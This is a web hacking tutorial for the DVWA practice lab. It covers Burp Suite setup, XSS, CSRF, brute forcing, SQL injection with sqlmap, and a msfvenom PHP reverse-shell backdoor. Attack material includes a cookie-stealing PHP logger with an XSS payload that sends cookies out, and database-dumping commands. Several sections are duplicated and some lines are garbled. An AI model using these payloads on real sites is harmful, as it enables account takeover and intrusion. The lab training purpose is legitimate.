Web Hacking

Cyber Security Simplified

Web Hacking

test image

Setting up DVWA and Configuring database and user

So, we will now install and configure the DVWA to do so we have to download dvwa zip file we have to go on www.dvwa.co.uk to download zip file

After downloading unzip the file on desktop or any desired folder, rename this with any desired name like dvwa

After that open your terminal and you can see that I am logged in as non- root user first login as root user

Type su in the terminal enter the password and you will be logged in as root user

Now, we will move the file from desktop to /var/www/html to do so we will use the move command

Type mv /home/sagar/Desktop/dvwa /var/www/html

The folder will be moved to the destination directory. Now, we will use chmod command to change the permissions of that folder. We will use 777 for this

Chmod 777 /var/www/html/dvwa

Now, with the root user permission type service apache2 start. Now it will start the apache service or apache server after that type service mysql start now, it will start the mysql service so to check this open your browser and type localhost and you will see a default apache page in it.

After that we will configure database for DVWA to do so open your terminal with root permissions and type mysql it will open a MariaDB now, type create database with name mydata as soon in the image below:

After that we have to create a user for it ,to do so type CREATE USER ‘myuser’@’127.0.0.1’ IDENTIFIED BY ‘mypass’;

after that we will grant all permissions to this user to do so type grant all on mydata.* to ‘myuser’@’127.0.0.1’;

after that we will flush the privileges to do so type flush privileges after that everything is configured with mysql and we will do the changes in the config file of DVWA, open the config file you can do this by terminal or by manually opening it, in some of the information like in the image below:

Save that file and then go to localhost/dvwa/setup.php now everything is done with mysql but there are some problems with DVWA, so we will fix them now.

Fixing issues In DVWA

After installing DVWA we will fix some issues we have encountered.

Now, we have to edit the file to fix some issues, the issues are allow_url_include and we will include installing a missing places module known as GD

Lets start fixing these issues to do so, we will first start mysql and apache2 service

After taking the root permission we will type apache2 start && service mysql start in the terminal

After that clear screen, Now we have to navigate to etc/php/7.0 now we have to edit the php.ini file so we will open this in leafpad so to open this in leafpad type leafpad php.ini

 then we have to find allow_url_include Then find this string in that file after finding this you can see that this flag has been set to off.

Edit this and type on instead of off. After that we have to install php-gd so, to install this open your terminal with super user permissions and the type apt-get install php-gd

Then you will get error because apache server is using the directory, burn the apache and mysql service off and then again run the same command. Now it will start installing the package

 it will ask you some basic information that do you want to modify the php.ini file choose keep the local version currently installed and your package will be installed successfully. Then restart the apache and mysql services and then open your browser and visit localhost/dvwa/setup.php

Now, everything is installed and enable to run the DVWA in a proper manner. Now we will install re-captcha. So, to get recaptcha keys go to https://www.google.com/recaptcha/intro/android.html You will se a button which says get recaptcha

Login with your google account and after that it will ask some of the basic information like label type of re-captcha etc.

Then, it will provide right key and a secrete key now we will open the configuration file of DVWA by typing leafpad/var/www/html/dvwa/config/config.inc.php you can see there are two fields in this file with public key and private key copy those keys and paste it there

Now, setup has been successfully completed and you can use admin/password for login

Configuring burp with browser

Here we will understand how to setup burp suite for penetration testing. For this you need to configure burp suite with your internet browser. To configure burp with your browser you need to install CA certificate to actually use and intercept traffic b/w websites. So let’s try to configure with your browser:

-> First open up your burp suite. Go to proxy->options.

-> Here you will see proxy listener. Here you will also see proxy interface as 127.0.0.1:8080 Here proxy is 127.0.0.1 and port is 8080. Now you can see that it is running.

-> Here you will see proxy listener. Here you will also see proxy interface as 127.0.0.1:8080 Here proxy is 127.0.0.1 and port is 8080. Now you can see that it is running.

Now scroll down and go to network proxy. Click on setting button.

Now you need to configure the manual proxy. In the HTTP proxy write 127.0.0.1 and in port type 8080. Click on OK.

->Now you can visit any website. But to browse website that use HTTPS you need to install CA certificate in your browser.

->For installing CA certificate in your browser type URL http://burp and press enter. Now click on CA certificate

Now on the pop up press OK. Now file is downloaded. Now open this downloaded file. Now on next pop up click on install certificate.

Now click on next->next->finish and certificate is installed. Now you can intercept all the traffic b/w your browser and burp.

-> Now let’s check if burp suite is setup perfectly. For this in your browser type google.com . Now go to burp suite. Click on proxy->intercept. Here you will see intercept is off.

Turn intercept on by clicking intercept is off button. Now the intercept is on. Go to your browser and you will see that page is loaded successfully. Now go to burp suite and you will see now traffic is going.

Now click on forward. Now turn off the intercept. Search something on Google. Now in the burp suite go to proxy->HTTP history and you can see the requests and responses here.

Various tabs (Options) in burp suite

  1. Target tab: Target tab list all the websites you have visited when your burp is configured as a proxy on your browser. In this tab burp does some of the scanning on the websites you have visited. It shows some of the folders and sub-folders etc. It also performs some simple scanning for vulnerability on websites like SSL certificates etc.

Don’t trust on all the issues that you got by this simple scanning because it produces many false positive. So it is advised that before reporting or going further you should check for the issues that you get by simple scanning manually. It also shows the whole tree or end points of a websites.

  1. Proxy Tab:

   2.1>Intercept: Intercept tab just intercept the traffic and show you in the real time. To demonstrate this let’s suppose i am logging to any udemy account. For this I filled username and password. Turn on intercept on burp and click on login button on udemy website. Now forward the request by clicking forward button in burp suite. Now in the burp suite you can see the whole request.

 2.2>HTTP History: In this tab it will log all the requests and responses throughout the session. Let’s suppose you have sent many requests it will log all the requests and their responses in this tab.

2.3>WebSockets History: This will detect it there are some web sockets.

2.4>Options: You can do a lot of things here. Here you can change the proxy listeners. You can import CA certificate or you can generate the CA certificate. Here can you add some interception rules like if rules match than intercept request otherwise don’t intercept. You can also intercept some of the server responses and add some rules there. You can also add some web sockets rules. You can also automatically modify the requests here. You can also replace some of the part of the request and their responses for e.g. you can add like if browser matches to Mozilla than replace it to chrome. There are several other options here that can help you to make your work easy.

 

Configuring burp with browser

Here we will understand how to setup burp suite for penetration testing. For this you need to configure burp suite with your internet browser. To configure burp with your browser you need to install CA certificate to actually use and intercept traffic b/w websites. So let’s try to configure with your browser:

-> First open up your burp suite. Go to proxy->options.

-> Here you will see proxy listener. Here you will also see proxy interface as 127.0.0.1:8080 Here proxy is 127.0.0.1 and port is 8080. Now you can see that it is running.

-> Here you will see proxy listener. Here you will also see proxy interface as 127.0.0.1:8080 Here proxy is 127.0.0.1 and port is 8080. Now you can see that it is running.

Now scroll down and go to network proxy. Click on setting button.

Now you need to configure the manual proxy. In the HTTP proxy write 127.0.0.1 and in port type 8080. Click on OK.

->Now you can visit any website. But to browse website that use HTTPS you need to install CA certificate in your browser.

->For installing CA certificate in your browser type URL http://burp and press enter. Now click on CA certificate

Now on the pop up press OK. Now file is downloaded. Now open this downloaded file. Now on next pop up click on install certificate.

Now click on next->next->finish and certificate is installed. Now you can intercept all the traffic b/w your browser and burp.

-> Now let’s check if burp suite is setup perfectly. For this in your browser type google.com . Now go to burp suite. Click on proxy->intercept. Here you will see intercept is off.

Turn intercept on by clicking intercept is off button. Now the intercept is on. Go to your browser and you will see that page is loaded successfully. Now go to burp suite and you will see now traffic is going.

Now click on forward. Now turn off the intercept. Search something on Google. Now in the burp suite go to proxy->HTTP history and you can see the requests and responses here.

Various tabs (Options) in burp suite

  1. Target tab: Target tab list all the websites you have visited when your burp is configured as a proxy on your browser. In this tab burp does some of the scanning on the websites you have visited. It shows some of the folders and sub-folders etc. It also performs some simple scanning for vulnerability on websites like SSL certificates etc.

Don’t trust on all the issues that you got by this simple scanning because it produces many false positive. So it is advised that before reporting or going further you should check for the issues that you get by simple scanning manually. It also shows the whole tree or end points of a websites.

  1. Proxy Tab:

   2.1>Intercept: Intercept tab just intercept the traffic and show you in the real time. To demonstrate this let’s suppose i am logging to any udemy account. For this I filled username and password. Turn on intercept on burp and click on login button on udemy website. Now forward the request by clicking forward button in burp suite. Now in the burp suite you can see the whole request.

 2.2>HTTP History: In this tab it will log all the requests and responses throughout the session. Let’s suppose you have sent many requests it will log all the requests and their responses in this tab.

2.3>WebSockets History: This will detect it there are some web sockets.

2.4>Options: You can do a lot of things here. Here you can change the proxy listeners. You can import CA certificate or you can generate the CA certificate. Here can you add some interception rules like if rules match than intercept request otherwise don’t intercept. You can also intercept some of the server responses and add some rules there. You can also add some web sockets rules. You can also automatically modify the requests here. You can also replace some of the part of the request and their responses for e.g. you can add like if browser matches to Mozilla than replace it to chrome. There are several other options here that can help you to make your work easy.

 

Finishing the burp suite

4.Scanner: Let’s suppose you have some website in your target tab than what scanner tab will do it will perform some scanning on that website for some common vulnerability that can be find in the website by automatic testing.

   4.1>Issue Activity: In this tab you can see detail of vulnerability like time, issue type, path, insertion type etc.

4.2>Scan queue: Here you can see the other websites you have queued for scanning.

 4.3>Live Scanning: Here it can perform live scanning on the website i.e. which website you are visiting it will start scanning it as well as you are also testing the website.

 4.4>Issue Definition: In this tab you can see that there are lot of issues defined in the burp which have definitions and which it can find out on websites.

 4.5>Options: In this tab there are various option you can use. You can select the individual issues for which you want to search on the website.

 

  1. Intruder: Let’s suppose you want to perform some bruit force attack on some mobile number or otp then you can perform that with the help of this tab.

  5.1>Target: This tab contains that website and the port on which it have to connect.

  5.2>Positions: In this position you need to define the position like which field you want to bruit force. To demonstrate this let’s suppose I want to bruit force the otp than select that field, click on Add. Now it is added.

  5.3>Payloads:  Instead of the field that we choose in positions tab we can add some custom payloads here or we can add some simple list here. For example we want to bruit force some numbers than we can choose numbers

  5.4>Options: In this tab you can just do something else like what is the number of threads which will be used while performing the attack, attack results, you have to store the requests or only the results and many other things.

6.Repeater: In this tab let’s suppose you want to repeat request with some modified parameters then you have to send that in repeaters and you can modify that parameter here and click on go to repeat that request.

7.Sequencer: let’s suppose a website is issuing the session cookie like 1234, then if you add these generated cookies to the sequencer than it analyze the session id or cookies and shows that if these cookies is in sequential form or not. Let’s suppose user A has cookie 1, user B has cookie 2 and so on. Here you can see that cookies are in sequential form so can take over that session by just manipulating the value of cookie. So before analyzing you need to capture at least 500 tokens.

  1. Decoder: In this tab you can decode some of the values like base 64, HTML or URL values by just placing that here. It can also perform encoding. It can also perform some hashing.
  1. Comparer: Let’s suppose there are two cookies first one is when user was not logged in and second one is when use was logged in. So if you want to compare both cookies like they have changed or not , if they have some minor changes then you can load them in comparer and comparer will show that how many digits, alphabets, or differences it has in the cookies. If there is no difference then cookie not has been change.
  2. Extender: In this tab you can add some third party code to customize the burp behaviors like you can add some scanners, access auditors etc. You can download these codes from respiratory of Github or from other place and just place it here.
  3. Project Options: Here you can add projects and some other things like upstream proxy servers etc.
  4. User Options: In this tab you can use SOCKS proxy and many other features.
  5. Alerts: Here it will show various alerts like your proxy service stopped, your proxy service has been started, host not connected etc.

Reflected and stored XSS or Cross site scripting on low security

XSS Is a very common and powerful attack vector that occurs when there is poor filtering of user inputs while rendering them on a webpage, there is a very common role amongst web developers that never trust users it means user can submit anything in the forms so if user submits a scripting tag in the form and web application renders it without any filtering then this may cause a problem. In the low security we will use a simple payload

Reflected: in reflected XSS the payload travels in the URL and will not execute until the user clicks on a malicious link which sometimes not possible as user may aware about this type of vulnerability.

Stored: in stored XSS user do not have to visit on any specially crafted links because in this type of XSS the payload is being installed in the database itself. It mean that let suppose there is a forum which supports commenting a user posts a malicious comment and all the other users intendedly  visits that page because they think that it is secure but they are trapped and their cookies might be stolen.

Reflected XSS

“><script>alert(1);</script>

Now, go to the XSS reflected XSS tab in DVWA after that you will be prompted a screen like this

 

Now after login go to DVWA security and set it to low. Now, go to the CSRF tab and you will see page like this.

This page is asking to enter your new password and confirm that now we will configure burp suite to listen all the request coming from the browser. We have defined everything like configuring burp with your browser previously.

Now, enter any random password in both fields and submit the request, turn the intercept on in the burp, you will see a request like this:

You can see GET request with the fields password_new and password_conf with your entered password. Now, there is two weaknesses

  1. The passwords is being sent with a GET request. It means they can be cached by the browser history and will be revealed to anyone who checks the history
  2. There is no CSRF’s token on this request it means that it is vulnerable to CSRF.

Now, go to your http history tab in burp and look for this request right click on the request and click copy URL

Now, paste this in notepad you can create a simple html page with this link but we are going to demonstrate only that how it works so, whenever person visits this URL his password will be change automatically but there is only one condition that the person should have to be authenticated on that website

Now, you can embed this into an html form or a simple button

CSRF on low security

CSRF also known as cross site request forgery is a vulnerability in which attacker traps a normal user to click on a specially crafted html button which may perform some of the un intended query on the behalf of the user like changing passwords, changing some of the information like e-mail, username etc. this may be exploited to full account takeover

 Now, we will demonstrate how to exploit it on DVWA which have low security enabled

Open your terminal with root permissions and start your apache and mysql server now, open your browser go to localhost/dvwa/login.php and do login with your default credentials.

Now after login go to DVWA security and set it to low. Now, go to the CSRF tab and you will see page like this.

This page is asking to enter your new password and confirm that now we will configure burp suite to listen all the request coming from the browser. We have defined everything like configuring burp with your browser previously.

Now, enter any random password in both fields and submit the request, turn the intercept on in the burp, you will see a request like this:

You can see GET request with the fields password_new and password_conf with your entered password. Now, there is two weaknesses

  1. The passwords is being sent with a GET request. It means they can be cached by the browser history and will be revealed to anyone who checks the history
  2. There is no CSRF’s token on this request it means that it is vulnerable to CSRF.

Now, go to your http history tab in burp and look for this request right click on the request and click copy URL

Now, paste this in notepad you can create a simple html page with this link but we are going to demonstrate only that how it works so, whenever person visits this URL his password will be change automatically but there is only one condition that the person should have to be authenticated on that website

Now, you can embed this into an html form or a simple button

Reflected and stored XSS or Cross site scripting on low security

XSS Is a very common and powerful attack vector that occurs when there is poor filtering of user inputs while rendering them on a webpage, there is a very common role amongst web developers that never trust users it means user can submit anything in the forms so if user submits a scripting tag in the form and web application renders it without any filtering then this may cause a problem. In the low security we will use a simple payload

Reflected: in reflected XSS the payload travels in the URL and will not execute until the user clicks on a malicious link which sometimes not possible as user may aware about this type of vulnerability.

Stored: in stored XSS user do not have to visit on any specially crafted links because in this type of XSS the payload is being installed in the database itself. It mean that let suppose there is a forum which supports commenting a user posts a malicious comment and all the other users intendedly  visits that page because they think that it is secure but they are trapped and their cookies might be stolen.

Reflected XSS

“><script>alert(1);</script>

Now, go to the XSS reflected XSS tab in DVWA after that you will be prompted a screen like this

After that you can enter any name in that field and it will be rendered on the screen now, if we put any scripting tag in it that will be executed as well. But, this is a reflected XSS then the payload will travel in the URL. So, to target a person we have to send him a URL.

Let’s enter our payload in it and see what happens “><script>alert(123);</script> Now as soon as we entered the payload and click on submit you can see an alert box popped up on your screen.

Now, to target a person you have to send this whole URL to him and then trap him to click on it to make that attack successful

Stored XSS

Now, there is another tab in DVWA which have stored XSS vulnerability so, that page takes your comment as input stored it in database and rendered them on the same page. The most important thing that makes this attacks more powerful is that you don’t have to trap the user on clicking a link

You can use this vulnerability to redirect user to a webpage but we will demonstrate only a alert pop up in this post. So, we will use our previous payload to make this happen the previous payload is “><script>alert(123);</script>

Now, after posting this as comment you can see a alert pop up. This alert pop up will not disappear after person close the tab and visit that page again because it is stored in the database and as many times the user visit this page a alert box will be popped ups.

 

Stealing cookies with XSS and DOMXSS

DOMXSS: DOM based XSS is an XSS attack where in the attack payload will executed as a result of the modifying DOM environment in the victims browser Used by the original client side script , so that the client side code runs in an unexpected manner.

So, to exploit this in DVWA we first set the security to low and then go to the XSS dom tab, you will see screen like this

In this page it is asking you to select the language if you select any language like English or French on new parameter is added to the url which is default with the values of language now, to execute XSS we have to inject our payloads to this parameter our payload is <script>alert(“hi”);</script>

If you inject this parameter in url like this you will get the XSS popup on your screen

Stealing cookies with XSS: we can also steal cookies using XSS there are some methods like you can use Java Script to redirect a user to a malicious site and then steal their cookies the code we are going to use for this is

 

 

<?php

 

function GetIP()

{

          if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))

                    $ip = getenv(“HTTP_CLIENT_IP”);

          else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))

                    $ip = getenv(“HTTP_X_FORWARDED_FOR”);

          else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))

                    $ip = getenv(“REMOTE_ADDR”);

          else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))

                    $ip = $_SERVER[‘REMOTE_ADDR’];

          else

                    $ip = “unknown”;

          return($ip);

}

 

function logData()

{

          $ipLog=”c.txt”;

          $cookie = $_SERVER[‘QUERY_STRING’];

          $register_globals = (bool) ini_get(‘register_gobals’);

          if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);

          else $ip = GetIP();

 

          $rem_port = $_SERVER[‘REMOTE_PORT’];

          $user_agent = $_SERVER[‘HTTP_USER_AGENT’];

          $rqst_method = $_SERVER[‘METHOD’];

          $rem_host = $_SERVER[‘REMOTE_HOST’];

          $referer = $_SERVER[‘HTTP_REFERER’];

          $date=date (“l dS of F Y h:i:s A”);

          $log=fopen(“$ipLog”, “a+”);

 

          if (preg_match(“/\bhtm\b/i”, $ipLog) || preg_match(“/\bhtml\b/i”, $ipLog))

                    fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>”);

          else

                    fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n”);

          fclose($log);

}

 

logData();

 

?>

So, copy the code save it in a php file and copy the file in /var/www/html folder. Now, create an empty file which is, mentioned in the php file in which it is going to save the cookies, copy that file in the same folder as well.

Now, we are ready to steal the cookies with the XSS.

Go to DVWA with low security and then the stored XSS tab, we can reproduce this on reflected XSS as well.

The message tab In the stored XSS will only accept 50 characters but this is a client side limitation, right click In the message tab and click on the inspect element and modify the max length from 50 to whatever you want.

Now, we will inject our XSS payload in it. The payload is <script>window.location=’http://localhost/steal.ph?cookie’+escape(document.cookie)</script>

Enter this in message section and then click on sign guestbook now, after that whenever a user visits to the reflected XSS tab his cookies will be saved in the c.txt file as shown in the image below:

“>

Creating A PHP Backdoor

Here we will learn how to create a PHP backdoor that we can upload on any website for the file upload vulnerability.  

Step1: Open your terminal and type command

msfvenom –p(stands for payload) <payload> lport(stands for listening port)=<listening port> lhost(IP address that payload will be listening for)=<IP address> -f(Stands for format i.e. in which format you want output) <format> and press enter.

For e.g. msfvenom –p php/meterpreter/reverse_tcp lport=7777 lhost=192.168.131.129 -f raw

1.1->To find lhost follow the steps:

              Open up your terminal and take root access using command su and then type your password to take root access. Now use command

    -> ifconfig and press enter.

   -> Now look for inet address and copy the IP address written in front of inet address. This will be used as LHOST.

Step2: Now you will see the PHP payload code. You need to copy that payload as shown in the image

Step3: Now open any text editor and paste the copied payload code. Now save this file with any name and php extension. In my case I’m naming it as payload.php

Now you have created a payload.php file that you can upload on any website.

Step4: Now we need to control access means you can upload that file but how will you control everything. Now remember the port means lport that you used in step1.Now let’s suppose you have successfully uploaded payload on the target website.

For controlling access we will use msfconsole. Now feel these simple steps for this:

> open your terminal and give command ->msfconsole and press enter. Now we’ll be entered into metasploit framework.

> Now type use multi/handler and press enter.

->Now you need to specify the payload. For that give command -> set payload <payload name> (that you have used in step1) and press enter. In my case payload is php/meterpreter/reverse_tcp so I will give command -> set payload php/meterpreter/reverse_tcp and press enter.

> Now type use multi/handler and press enter.

->Now you need to specify the payload. For that give command -> set payload <payload name> (that you have used in step1) and press enter. In my case payload is php/meterpreter/reverse_tcp so I will give command -> set payload php/meterpreter/reverse_tcp and press enter.

-> Now you need to setup the lhost and lport.

       For lhost setup use command -> set lport . As we used 7777 in step1 so will give command ->set lport 7777 and press enter.

       For lhost setup use command -> set lhost . As we used 192.168.131.129 in step1 so will give command ->set lhost 192.168.131.129 and press enter.

      Now give command -> show options and press enter. It will give output given in the image

Brute forcing on low security

Brute forcing: brute forcing is trying or sending the same request some modified parameters in a very fast manner it means if we know the username and have about 10 passwords and we are vauge about the correct password then instead of trying them manually we automate that using burp suite. This whole process of automation is known as brute forcing.

Now, we will demonstrate that on DVWA to do so first of all open your terminal with root permissions and start the apache and mysql services after that open your browser and go to localhost/dvwa login with your credential

After that open your burp suite and configure it to listen all the request coming from the browser by adding the localhost proxy in it.

Now, set the security of DVWA as low.

Now, go to the brute force tab of DVWA you can see a form like this

It is asking for your username and password, enter your username and any wrong password intercept the request using burp.

Since you have entered a wrong password then it will say that the password is wrong. Now, go to your http history tab and look for this request

Press ctrl+I to send this request intruder. After that go to your intruder tab there will be four other tabs in intruder. First go to target tab

Target tab: target tab defines the target website on which you are going to carry out this attack.

Position tab: in positions tab you have to define on which positions payload will be inserted in the base request. Now in the third tab

Payloads: in this tab you have to add the payloads you want to insert in the base request.

Now, in position tabs we will hit on a clear button to clear all the positions.

Now, select the value of password and click on add.

Now, go to payload tabs and add payload. You can load a simple list of passwords from a text file or you can add your custom password you also have the option to brute force from some numbers to number. Now, I have loaded a file in payload options.

SQL Injections on low security

SQL injection is a code injection technique, used to attack data-drivn applications, in which sql statement are inserted into an entry field for execution. Ex. To dumb the database content to the attacker. SQL injection must exploit a security vulnerability in an application software for ex. When user inputs is either incorrectly filtered for string literal escape characters embedded SQL statement or user input is not strongly typed and unexpectedly executed.

SQL injections attacks allows attackers to spoof identity, tamper with existing data, cause, repudiation, such as violating transactions or changing balances, allow the complete disclosure of data on the system, destroy the data or make It otherwise unavailable and become administrators of the database server.

Exploiting It on DVWA on low security

Login to DVWA and set the security to low, now go to SQL injection tab you will see a page like this:

It is asking for a user id and you can any user id like 1,2,3,4,5 now, before entering a user id we will configure burp to listen all the request coming from the browser.

Now, a user id as 1 turn the intercept on in burp and click on the submit from browser. Now, you will see a request on the screen.

Now, we will use SQLmap to exploit SQL injections and will use the text file method in SQLmap. 

Copy the request from the intercept tab and paste it in leafpad and save the file on the desktop.

Now, follow these steps:

  1. First, we have to enumerate the number of databases. So we will use this command sqlmap –r /home/sagar/Desktop/l.txt –dbs

The –dbs will be use to enumerate the databases. Press enter and you will see that it starts testing against the url.

  1. After sometime it will show the number of available databases and will log the fetched data into a file.
  1. After that we have to enumerate tables in any of those databases, use this command to enumerate tables in the database mydata sqlmap –r /home/sagar/Desktop/l.txt –D mydata —tables

Here –tables will enumerate tables in the database. Press enter and it will show you the tables in the database

  1. Now, we have to enumerate columns in the database mydata so we will choose one of the tables to enumerate. So for this we will use this command sqlmap –r /home/sagar/Desktop/l.txt –D mydata –T users –columns

–columns will show you all the columns in table users and it will show you a output like this:

  1. Now, after that we have to fetch the data in those columns, we will use this command for this: sqlmap –r /home/sagar/Desktop/l.txt –D mydata –T users –C password –dump
  2. Now, it will start dumping the password from the column users after that it will analysis the passwords retrieved from the database. In my case it is saying that the passwords is in empty file and it will ask you if you want to crack those hashes from the default wordlist. If you say yes, it will crack all the hashes and will show you the plain text passwords

You can also, dump whole the table by just using a simple command

sqlmap –r /home/sagar/Desktop/l.txt –D mydata –T users –dump

You can use SQLmap to exploit the blind SQL injection with the same step or method described above.

Leave a Reply

Translate »
Help-Desk